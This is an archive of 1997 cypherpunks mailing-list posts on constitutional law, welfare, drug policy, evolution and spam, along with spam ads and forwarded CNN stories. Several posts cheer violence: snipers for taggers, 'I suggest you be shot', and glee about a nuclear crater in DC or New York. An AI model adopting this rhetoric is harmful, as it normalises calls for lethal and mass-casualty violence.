> Let's try this from a different angle... Say it was charity. Would it, in
> your opinion, be constitutional for a private charity to require Norplant
> before dispensing the charitable goods and services?

Contracts between private individuals are not constrained by the
Constitution so your allegory is flawed. What the government can and can't
do as a result of its charter to represent all the people has nothing to do
with what two individuals arrange between themselves on a consensual basis
involving a contract.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From sunder at brainlink.com  Sat Aug 23 10:27:40 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Sun, 24 Aug 1997 01:27:40 +0800
Subject: heart
In-Reply-To: 
Message-ID: 



On Sat, 23 Aug 1997, ? the Platypus {aka David Formosa} wrote:

> If we are willing to consider anyone of us to be less then human then we
> all become less human.  No one has a right to consider anthoughter less
> then human.

So what you are saying then is that when the scum inserts a toilet plunger
up someone's butt you consider them less than human, therefore all of
humanity becomes less than human including the plunging scum, therefore
he himself is less than human...  

Which means you're agreeing with me, or you don't know shit about logic. 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From ravage at ssz.com  Sat Aug 23 10:30:46 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 01:30:46 +0800
Subject: lack of evolutionary pressures (fwd)
Message-ID: <199708231730.MAA25395@einstein.ssz.com>



Forwarded message:

> Date: Sat, 23 Aug 1997 10:18:44 -0700
> From: Tim May 
> Subject: Re: lack of evolutionary pressures

> Bluntly
> put, it ain't going _anywhere_, at least not very fast. Changes in the
> characteristics of a species, loosely speaking, "evolution," happen faster
> in small populations.

Actualy this premise is false. The results of evolution stand out more in
smaller populations because a given change can propogate through the
population with less chance of being swammped by other changes that are
also propogating through that population. There is also the fact that the
vast majority of changes are either harmless or else debilitating further
slowing the genetic drift.

Look at it this way. If we have 1000 mating pairs and one of those pairs
progeny has a genetic change it is much easier for that change to get
propogated because the odds of the offspring mating with the other 999 pairs
offspring are much higher than if there were say 10,000 pairs. The number of
generations required for that change to become ubiquitous in small
populations is much lower than in larger populations.

The genetic drift for a given species is usualy low because of this
dillution whereas if a punctuating event occurs it will lower the available
pool of mates and hence the relative changes increase until the new
population becomes stable, usualy because the mitigating effects of the
punctuating event have receded.

If you would like a concrete case to study, review the research about
genetic drift in monkey populations in the Great Rift Valley in Africa.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From mixmaster at remail.obscura.com  Sat Aug 23 10:32:02 1997
From: mixmaster at remail.obscura.com (Mix)
Date: Sun, 24 Aug 1997 01:32:02 +0800
Subject: Welfare Solution #389
Message-ID: <199708231711.KAA13141@sirius.infonex.com>




Alex Le Heux (alexlh at yourchoice.nl) wrote:
> Unfortunately our own government is slowely succumbing under the 
> international pressure, and soon we'll have our own War On Drugs here.

I say, Lord help me if they outlaw hash bars. 

Anonymous wrote:
>   Many in the welfair class have their basic needs met by the government
> and then steal to buy heroin.

This is odd; I am sure that heavy drug dependents are more likely to
want money from welfare, but I query you: Does that necessarily mean 
that welfare recipients are more likely to be drug dependent?

> [Query: who is the victim in a drug case? -- but I digress...].

That's funny, I don't know who the victim is in this drug case you
fail to describe. I haven't read the decision writings. How should
I know?

I could imagine that a junkie who takes some old lady's purse to buy
heroin is victimizing the old lady, but is a student smoking marijuana
and drinking a beer victimizing anyone? What about a heroin junkie who
is rich, though unpopular, and never committed any other crime? Have
they made themselves a victim of something? Maybe so...the needle,
the darkness, the overwhelming Love Which Cannot Be Real. But the
state shouldn't recognize "mystical entities" like this as perpetrators.
The person in this case is making a choice; they will do no harm but
to themselves. Are they then a victim, or a perpetrator, or both?

> Also, if it was a crime where the victim suffered financial losses, the
> defendant not only has to pay the Crime Victim's Fee but also restitution
> to the victim.

Does not theft of belongings in any case deserve punitive and
recompensive financial damages? Like the U.S. Park Service theft
of the ranch on Santa Cruz Island?

-THE LIE






From stend+cypherpunks at sten.tivoli.com  Sat Aug 23 10:33:12 1997
From: stend+cypherpunks at sten.tivoli.com (Firebeard)
Date: Sun, 24 Aug 1997 01:33:12 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
In-Reply-To: <199708231619.LAA24929@einstein.ssz.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

>>>>> Jim Choate writes:

JC> Forwarded message:
>> From: Lucky Green  Subject: Re: lack of
>> evolutionary pressures (was Re: An end to "court (fwd)

>> >You need to read the Constitution again, you missed something
>> critical in >there.
>> 
>> Nope, I didn't. Nowhere is the Constitution does it say that
>> citizens have a right to welfare money. The State is free to make
>> virtually anything not expressly prohibited by the Constitution a
>> condition for providing welfare.

JC> Yes, Lucky you did.

JC> Go read the 10th. The state is NOT (I say again, NOT) allowed to
JC> do anything not expressly allowed because the Constitution is a
JC> clear refutation of this sort of thinking.

	No, the federal government is barred.  The state governments
are free to do so (constrained by their own constitutions).  For that
matter, the federal government shouldn't be involved in the business
of affecting the specific welfare of individuals, so it should be a
moot issue.  But they cover everything by the commerce clause ("A bird
landing on your roof will travel between states during migration, so
we can regulate the construction of your house."), so they do it
anyways.

- -- 
#include                                /* Sten Drescher */
Unsolicited bulk email will be stored and handled for a US$500/KB fee.
It is by caffeine alone I set my mind in motion, it is by the beans of
Java that thoughts acquire speed, the hands acquire shaking, the
shaking becomes a warning, it is by caffeine alone I set my mind in
motion. -- Carlos Nunes-Ueno, 3/29/95

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQBVAwUBM/8eRfCBWKvC9LiRAQGddwH/X8ju6MNj5aWJJm5I0UgnV3k3bqovbHwE
ao/s6Ld1L6TWeVQUMs1webSJrDafzuUmWnpSOS44Nza1Z3yfut9yWQ==
=ukNu
-----END PGP SIGNATURE-----






From enoch at zipcon.net  Sat Aug 23 10:41:47 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Sun, 24 Aug 1997 01:41:47 +0800
Subject: Practical Assassination Politics
Message-ID: <19970823173259.20002.qmail@zipcon.net>



I was just browsing the Foresight Exchange (formerly Idea
Futures) and notice that there have been a few changes.  First,
the instruments are now referred to as "bets" and there is quite
a bit more use of the language of "Non-Traditional Wagering."

One claim that caught my eye was BCPrez, owned by
sburnap at wsgc.com and judged by Gafter at eng.sun.com.

This claim pays $1 for each YES coupon if Bill Clinton is
President of the United States at noon on January 1, 2001.

This claim pays $1 for each NO coupon if Bill Clinton is no
longer President of the United States at noon on January 1, 2001,
for any reason including, but not limited to resignation,
impeachment, or death.
                ^^^^^:)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From free at web.site  Sun Aug 24 01:43:18 1997
From: free at web.site (free at web.site)
Date: Sun, 24 Aug 1997 01:43:18 -0700 (PDT)
Subject: Attn: Business owners...a COOL web site...FOR FREE
Message-ID: <>



Need a web site? 

Don't want one of those boring yellow pages?

How about a javascript-enhanced web site, complete with animations and a
searchable index of your products and services...a COOL web site...FOR 
FREE?

Check out the sample site at www.the-www.com

Then download the FREE software today.

Again that's http://www.the-www.com


Generate new leads...get better results...Get online today!






From free at web.site  Sun Aug 24 01:43:18 1997
From: free at web.site (free at web.site)
Date: Sun, 24 Aug 1997 01:43:18 -0700 (PDT)
Subject: Attn: Business owners...a COOL web site...FOR FREE
Message-ID: <>



Need a web site? 

Don't want one of those boring yellow pages?

How about a javascript-enhanced web site, complete with animations and a
searchable index of your products and services...a COOL web site...FOR 
FREE?

Check out the sample site at www.the-www.com

Then download the FREE software today.

Again that's http://www.the-www.com


Generate new leads...get better results...Get online today!






From tcmay at got.net  Sat Aug 23 10:55:36 1997
From: tcmay at got.net (Tim May)
Date: Sun, 24 Aug 1997 01:55:36 +0800
Subject: Shooting the taggers
In-Reply-To: 
Message-ID: 



At 10:45 PM -0700 8/22/97, Bill Stewart wrote:
>At 10:57 AM 8/22/97 -0700, Tim May wrote:
>>There's a solution for taggers: snipers.
>>(I'm indebted to Chip Morningstar for this succinct solution.)
>
>I'm highly opposed to this inappropriate use of excess force.
>Snipers with paint-guns?  Sure.  Snipers with rock-salt guns?  Perhaps.
>Snipers with real bullets?  Sorry, it ain't worth murder.
>
>On the other hand, the parallels between graffiti taggers and
>SPAMMERs are fairly direct...

No, "spam" is like a telephone call or other contact one may not like, but
which is using a legal channel. Like someone knocking on  your gate. (It
may be that many of these contacts are "unwanted." So? By listing an e-mail
address, or a phone number, or placing a buzzer on a gate, one is
essentially saying "Contact me." Some of these contacts, even if
unrequested, turn out to be positive. Some are negative. All are within
legal bounds.

Grafitti is a trespass onto physical property. If someone enters my
property and spray paints my walls, this is criminal.

It shows how overloaded and ambiguous the term "spam" has become when even
a usually careful writer like Bill is equating criminal trespass with
spamming.

(In one of the newsgroups I read, an increasing response to unpopular views
is to call them "spam." Jeesh.)


--Tim

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From nobody at REPLAY.COM  Sat Aug 23 11:09:26 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 24 Aug 1997 02:09:26 +0800
Subject: Shooting the taggers
Message-ID: <199708231756.TAA21560@basement.replay.com>



Grand Wazoo MixMaster wrote the lie:

> There appears to be a wonderful market for long-range nonlethal
> stun weapons. I wonder, if a tagger is marking your building,
> would it be legal to stun him from a distance and then call the
> cops?
> 
> Rape can be argued to be deserving of serious punishment of some kind,
> but would tagging deserve death when a nonlethal option exist? Could
> not the woman stun the rapist and then call the cops?

  No. Stun guns are increasingly illegal because some guy once
used one to rob a 7-11 or something, for $15.00.
  Since stopping rape is worth less than $15.00 to those who make
the laws, they have decided that a few thousand rapes is a small
price to pay to protect minuscule corporate interests.

-THE 1/2LIE







From wombat at mcfeely.bsfs.org  Sat Aug 23 11:14:20 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Sun, 24 Aug 1997 02:14:20 +0800
Subject: None
In-Reply-To: <23sNBe14w165w@bwalk.dm.com>
Message-ID: 





On Mon, 18 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> Anonymous  writes:
> 
> ...
> > It would be a day to celebrate loudly if someone put a crater in DC.
> 
> I'd love for this to happen!  I wish someone would condense the instructions
> for making nukes in one's garage into 4-6 lines suitable for .sigs.

New York will probably get it first, Doctor.






From owner-cypherpunks  Sun Aug 24 02:32:54 1997
From: owner-cypherpunks (owner-cypherpunks)
Date: Sun, 24 Aug 1997 02:32:54 -0700 (PDT)
Subject: Make Money Giving Away Free Phone Cards
Message-ID: <199708240932.CAA21131@toad.com>


This message is being brought to you by EMAIL BLASTER 2.5 software.  If you would like a FREE copy of this software or any of our other HOT programs ABSOLTELY FREE call our FAX ON DEMAND number at 213-960-7822.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Your email address was given to me as a person interested in business opportunities....If THIS IS NOT
CORRECT and you wish removal from my list, hit reply and type REMOVE in the subject area...

"FREE" HOME BUSINESS! No startup fee! No monthly minimum! No risk! We provide you with a FREE Home business PLUS 9.9cpm flat rate, unrestricted long distance service with no minimums and no
circles. Calling cards, 800# all available at great rates. PLUS get your own FREE Home Business.
We will give you a FREE web page, free email address, ads, locations to advertise, PLUS a $400
bulk email program. FOR FREE! THERE ARE NO CATCHES or HIDDEN COSTS.

For quick and FREE details, just send an email with FREEDOM in the subject.

I look forward to your response.








From anon at anon.efga.org  Sat Aug 23 11:49:20 1997
From: anon at anon.efga.org (Anonymous)
Date: Sun, 24 Aug 1997 02:49:20 +0800
Subject: Top 10 Ways to Make a Grouchy Old CypherPunk Smile - #10
Message-ID: 



Top 10 Ways to Make a Grouchy Old CypherPunk Smile
--------------------------------------------------
#10) Find his shoes for him.

#9)

#8)

#7)

#6)

#5)

#4)

#3)

#2)

#1) [This space reserved for T.C. May]







From ravage at ssz.com  Sat Aug 23 12:00:50 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 03:00:50 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
Message-ID: <199708231858.NAA25765@einstein.ssz.com>



Forwarded message:

> Subject: Re: lack of evolutionary pressures (was Re: An end to "court (fwd)
> From: Firebeard 
> Date: 23 Aug 1997 12:30:45 -0500

> 	No, the federal government is barred.  The state governments
> are free to do so (constrained by their own constitutions).  For that
> matter, the federal government shouldn't be involved in the business
> of affecting the specific welfare of individuals, so it should be a
> moot issue.

This I agree with completely. At no point in the Constitution does it give
the federal government the job of welfare. It also does not provide for any
mechanism for law enforcement (ie DEA, NSA, FBI, etc.) outside of taxes and
inter-state commerce.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From wombat at mcfeely.bsfs.org  Sat Aug 23 12:04:30 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Sun, 24 Aug 1997 03:04:30 +0800
Subject: David Downey asks to be shot
In-Reply-To: 
Message-ID: 



We'll fall-in out in the compound as soon as Tim finds his shoes.

On Tue, 19 Aug 1997, Tim May wrote:

> At 6:23 AM -0700 8/19/97, David D.W.Downey wrote:
> >blackjack at hotmail.com wrote:
> >
> >> Saw your post in the newsgroups.
> >>
> >> Check this out!
> >>
> >> http://www.geocities.com/Eureka/Plaza/1022
> >
> >  Ya know, this shit really pisses me off. I understand that we have to
> >protect everyone's rights if we wish are own to be protected. This is a
> >classic case of what is causing the mainstream public to hash so hard
> >about porn and such. I did nothing to solicit this beyond posting to a
> >news group. This troller comes along, scarfs my email address and then
> >sends me this email. If you click on the link it sends you to a place to
> >sign up for accessing a hard porn site. This is what feeds the initiated
> >Johnnie Q.Public's desire to control the net, and endangers all of our
> >rights on the net. I understand that we have to protect the enemies'
> >rights too, but can't we just shoo a few of them first? Lowers the
> >numbers needing protection and might help us out in the end.
> >Grrrrrrr!!!!
> 
> I agree. We should shoot a few of the enemies first.
> 
> I suggest you be shot.
> 
> 
> --Tim May
> 
> There's something wrong when I'm a felon under an increasing number of laws.
> Only one response to the key grabbers is warranted: "Death to Tyrants!"
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1398269     | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 






From stend+cypherpunks at sten.tivoli.com  Sat Aug 23 12:14:43 1997
From: stend+cypherpunks at sten.tivoli.com (Firebeard)
Date: Sun, 24 Aug 1997 03:14:43 +0800
Subject: Inside the Cypherpunks Cult (fwd)
In-Reply-To: <199708220254.VAA18931@einstein.ssz.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

>>>>> Jim Choate writes:

JC> And any soldier who fires on Americans is clearly going against
JC> prima facia evidence that the framers intended for American
JC> military force to NEVER be used against American citizens on
JC> American soil.

	Being a Pennsylvania native, I refer you to the 'Whiskey
Rebellion', 1791-4, western Pennsylvania.  Mr Washington, one of those
framers, sent American troops (militia, under federal control) against
American citizens on American soil.  And I don't recall Mr Washington
being impeached for violating the Constitution (although Jefferson did
resign as Secretary of State, in part, over this).  A page with some
discussion of this is ,
but I think it's too optimistic on one point.  It says that without
the 'Rebellion' "the government of today might be the aristocratic
monarchy that Hamilton and the Federalists tried so hard to install".
It may have delayed it, but our government certainly seems to rule
based on the Divine Right of Bureaucrats.

- -- 
#include                                /* Sten Drescher */
Unsolicited bulk email will be stored and handled for a US$500/KB fee.
It is by caffeine alone I set my mind in motion, it is by the beans of
Java that thoughts acquire speed, the hands acquire shaking, the
shaking becomes a warning, it is by caffeine alone I set my mind in
motion. -- Carlos Nunes-Ueno, 3/29/95

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQBVAwUBM/810fCBWKvC9LiRAQGO8QH/dDfWFmBuGilbrYhv6JmLu1NZkkIUe+GZ
TrdN4aoKA4iNEassUeevM3b8+esFe/fgUQIElw+GP/vaceTXx3J+Eg==
=NJ0Y
-----END PGP SIGNATURE-----






From wombat at mcfeely.bsfs.org  Sat Aug 23 12:40:28 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Sun, 24 Aug 1997 03:40:28 +0800
Subject: ROTFL / Re: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <199708220530.HAA22261@basement.replay.com>
Message-ID: 





On Fri, 22 Aug 1997, Anonymous wrote:

> Ray Arachelian wrote:
> > 
> > On Thu, 21 Aug 1997, Tim G. May wrote:
> > 
> > > "When all you have is a gun, everything looks like a target."
> > >
> > > Tim G. May
> > 
> > When all you have are arrest warrants, everyone looks like a drug dealer.
> > :)
> 
>   "When all you have is spam, everyone looks like Tim C. May."
>          - Dimitri Vulis, KOTM
> 
> 
> 

When all you have is ascii art, it's hard to hang a picture that matches 
the sofa.






From wombat at mcfeely.bsfs.org  Sat Aug 23 12:42:34 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Sun, 24 Aug 1997 03:42:34 +0800
Subject: take The Boulder Pledge now!!!
In-Reply-To: <33FCD4D4.3126@dev.null>
Message-ID: 





On Thu, 21 Aug 1997, Graham John-Bullshit wrote:

> I think amp needs to have our 2000 friends each send 20,000 copies
> of this post back to him.
> 
> amp at pobox.com wrote:
> 
> > hahahaha ROTF! Stop spam, please forward this to 2000 of your closest friends

I thought it was just a vague Jungian reference.






From nobody at REPLAY.COM  Sat Aug 23 12:49:56 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 24 Aug 1997 03:49:56 +0800
Subject: Hlep
Message-ID: <199708231940.VAA02289@basement.replay.com>



I am trying to find a place to do a cypherpunks list archive search
by Subject: header. (unsuccessfully)
Does anyone have any pointers they can spare?

(No. My problem is not that I can't spel "Help.")






From vipul at pobox.com  Sat Aug 23 13:08:13 1997
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Sun, 24 Aug 1997 04:08:13 +0800
Subject: US DoC on anonymizer
In-Reply-To: 
Message-ID: <199708240112.BAA00582@fountainhead.net>



Ulf =?iso-8859-1?Q?M=F6ller?= wrote:

> http://www.ntia.doc.gov/ntiahome/speeches/licomnet_101496.htm

>  "A Vision of Tomorrow: Using Technology to Empower, Not to Control"

>    We also endorse the use of technology to give privacy protection. For

Ah! The holy sanction.  

>    instance, individuals can use filtering technologies that read rating
>    tags and block those that fail to achieve a desired level of privacy.
>    PICS technology is being adapted to screen out Web sites that do not
>    adhere to a specified level of privacy protection. Another example is

What does this exactly mean? 

>    the "anonymizer," which assigns an anonymous identity to a user and
>    allows the user to shield personal information from Web sites that he
>    or she visits.

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul at pobox.com 	          | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces






From ravage at ssz.com  Sat Aug 23 13:24:52 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 04:24:52 +0800
Subject: Inside the Cypherpunks Cult (fwd)
Message-ID: <199708232024.PAA26124@einstein.ssz.com>



Forwarded message:

> Subject: Re: Inside the Cypherpunks Cult (fwd)
> From: Firebeard 
> Date: 23 Aug 1997 14:11:13 -0500

> >>>>> Jim Choate writes:
> 
> JC> And any soldier who fires on Americans is clearly going against
> JC> prima facia evidence that the framers intended for American
> JC> military force to NEVER be used against American citizens on
> JC> American soil.
> 
> 	Being a Pennsylvania native, I refer you to the 'Whiskey
> Rebellion', 1791-4, western Pennsylvania.  Mr Washington, one of those
> framers, sent American troops (militia, under federal control) against
> American citizens on American soil.

Militia <> Army.

Exactly, they were militia NOT federal troops. This is EXACTLY why we have
the militia mentioned in the 2nd. With there being no mechanism to
constitutionaly employ federal troops against Americans there had to be some
means to maintane the peace. In addition there needed to be some mechanism
to prevent the federals from mis-using those troops hence the 2-year limit
at the federal level for all monies expended on federal troops. No such
limit applies to monies given to the states to fund their individual
militias. Which are LOANED to the federal government with the consent of the
govenor of the particular states. The idea being that if the fed's mis-use
those troops the govenor simply orders them to stand down. Without voluntary
help from the states the feds should be powerless inside the borders of the
US.

I suspect that there is a certain level of misrepresentation of what went on
during the Whiskey Rebellion (which I was aware of before your elucidation).
Near as I can tell Washington acted responsibly within the bounds of the
intent and word of the Constitution.

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From whgiii at amaranth.com  Sat Aug 23 13:28:09 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 24 Aug 1997 04:28:09 +0800
Subject: None
In-Reply-To: 
Message-ID: <199708232017.PAA06098@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/23/97

   at 12:43 PM, Rabid Wombat  said:




>On Mon, 18 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

>> Anonymous  writes:
>> 
>> ...
>> > It would be a day to celebrate loudly if someone put a crater in DC.
>> 
>> I'd love for this to happen!  I wish someone would condense the instructions
>> for making nukes in one's garage into 4-6 lines suitable for .sigs.

>New York will probably get it first, Doctor.

You say this as if it would be a bad thing. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/83t49Co1n+aLhhAQGhbAQAs5qi7U4BXooENYq+UfE9HiUu9/+58bRq
bbkSk1uJEoJtgVilS4PMS1C1dRFaggP5X4M86i6mES934n1d/flUI9xkCrDWHEry
EjB+taMscdVkIDZEnqQpJy18mbMzieo0N5sNo915yqaXuKVRq0ozJ4tFKEEr0iUy
/PLdCAvAF0w=
=6UEN
-----END PGP SIGNATURE-----






From ravage at ssz.com  Sat Aug 23 13:31:45 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 04:31:45 +0800
Subject: index.html
Message-ID: <199708232029.PAA26197@einstein.ssz.com>



    CNN logo 
   Navigation 
   
   Infoseek/Big Yellow 
   
   
   Pathfinder/Warner Bros 
   
   
   
   
   Main banner CNN- Your Local Link rule
   
                    JUDGE DISMISSES WOMAN'S DISNEYLAND SUIT
                                       
      Disney lawsuit August 22, 1997
     Web posted at: 10:44 p.m. EDT (0244 GMT)
     
     LOS ANGELES, (Reuter) -- A judge on Friday dismissed asuit brought
     against Disneyland by a woman who said she wasrobbed at the theme
     park and her grandchildren were traumatized by seeing Disney
     characters remove their costumes.
     
     The lawsuit was brought by Billie Jean Matay, 57, who wasone of the
     first group of Mouseketeers, young Disneyentertainers dressed in
     costumes that included Mickey Mouse ears, to perform at Disneyland
     when it opened 40 years ago.
     
     Orange County Superior Court Judge Richard Luesenbrink said,"There
     is nothing to suggest this incident could have beenavoided."
     
     The dismissal came after Matay's lawyer had rested his case.
     
     Matay, who broke down on the witness stand when shetestified, blamed
     poor security at the park's parking lot for her being robbed of $165
     at gunpoint in August 1995 when she went there with her three
     grandsons, aged between 5 and 10.
     
     She said that after the incident, security guards detainedher family
     and her grandsons were shocked and traumatized when they saw Disney
     characters they believed were real take off their costumes in a back
     stage area.
     
     Copyright 1997 Reuters Limited. All rights reserved.
     
    
   rule
   
  Related site:
  
     Note: Page will open in a new browser window
     * Welcome to Disneyland
       
     
     
     External sites are not endorsed by CNN Interactive.
     
   
     _________________________________________________________________
   
   Infoseek search ____________________ ____  ____
   
     _________________________________________________________________
   
   
   rule Message Boards Sound off on our
   message boards
   
   You said it... [INLINE] CNN- Your Local Link rule
   To the top 
   
   � 1997 Cable News Network, Inc.
   All Rights Reserved.
   
        Terms under which this service is provided to you.






From ravage at ssz.com  Sat Aug 23 13:33:21 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 04:33:21 +0800
Subject: pna.show_story?p_art_id=246054&p_section_name=Sci-Tech
Message-ID: <199708232030.PAA26230@einstein.ssz.com>



   CNN Custom News logo
   Home
   [INLINE]
   World
   U.S.
   Weather
   Sports
   Your Money
   Business
   Sci-Tech
   Showbiz
   Lifestyle
   On Target
   [INLINE]
   Customize Profile 
   [INLINE]
   Help
   Feedback
   Switch User
   CNN Interactive 
   CNN Interactive Sci-Tech
   [INLINE]
   CNN SI 
   [INLINE]
   CNN FN 
   [INLINE]
   All Politics 
   [INLINE]
   
   InfoSeek 
   
   Link of the Day 
   [LINK] 
   
   Video Pick of the Day 
   [LINK] 
   [INLINE] August 23, 1997 4:26 pm EDT
   [INLINE]
   Sci-Tech Title [INLINE] Ad Space 
   
   
   The story below was selected from CNN Custom News - a new personalized
   service that delivers only the news that's important to YOU.
   
   Sign up now to receive your personal news stories, weather, sports
   scores, and stock quotes from over 100 different sources - all for
   FREE. If you're already a user, please login. Custom News 
   Ohio Man Given Five-Year Term in Internet Sex Case
   
   Reuters
   22-AUG-97
   
   
   CAMDEN, N.J. (Reuter) - An Ohio man was sentenced Friday to five years
   in a federal prison for using the Internet to induce a 12-year-old New
   Jersey girl to make sexually charged videos of herself and send them
   to him.
   
   Paul Brown Jr., 47, of Cleveland Heights, was arrested in February
   after the West Caldwell girl's parents discovered some Internet
   communications. Brown had posed as a teen-ager in responding to the
   girl's Internet request for an e-mail pal.
   
   A statement from the girl, now 14, was read in court. She accused
   Brown of ``emotional rape'' and said her life ``has been a disaster''
   since she learned the truth about him.
   
   Brown was convicted on morals and pornography charges. His crimes were
   considered federal offenses because of their interstate nature.
   
   
   
   
   
   
   Ad Space 
   
   Top 
   
   Copyright © 1997 Cable News Network, Inc. A Time Warner Company
   ALL RIGHTS RESERVED.
   
   Terms under which this information is provided to you. [INLINE]
   






From vipul at pobox.com  Sat Aug 23 13:34:28 1997
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Sun, 24 Aug 1997 04:34:28 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: <19970821224859.24682@bywater.songbird.com>
Message-ID: <199708240144.BAA00616@fountainhead.net>



-----BEGIN PGP SIGNED MESSAGE-----

Kent Crispin wrote:

> On Fri, Aug 22, 1997 at 12:40:29AM +0000, Vipul Ved Prakash wrote:
> > Kent Crispin wrote:
> > 
> > > > But the ability of a herd to take a vote, real or alleged, will not be
> > > > sufficient to collect tribute from those who don't want to make the
> > > > contribution freely.
> > 
> > > Note another characteristic of cult thinking -- total separation of
> > > the illuminati from the "herd" -- the idea that the "chosen" are
> > > irrevocably different from those other unfortunate creatures that
> > > accidentally share the same physical form. 
> > 
> > the idea is that the "competent" (not "chosen") are irrevocably different 
> > from those other "incompetent and parasitical" (and not "unfortunate") 
> > creatures that accidentally share the same physical form.

> And how is it that one knows that one is "competent"?

A law to collect "tribute" money will be supported by people who 
want to leech "competent" value producers of thier property. 
A collection of such incompetent parasites is a "herd" 
in the current context. On the other hand a collection of 
good value producer who dont want to live of other people and 
dont approve of a law that enforces such a behaviour is the "competent". 

Though, to identify competent from incompetent, is quite besides 
the point. Collection of any tribute money at a point of a gun, 
is a bad thing and is ethically wrong. I want call it
"cult" thinking. Its a simple _objective_ law that
ensures freedom of choice. And one has to identify it and 
learn to respect it. 

best,
Vipul

one has to identify and act accordingly if want to live 
peacefully. 
- -- 

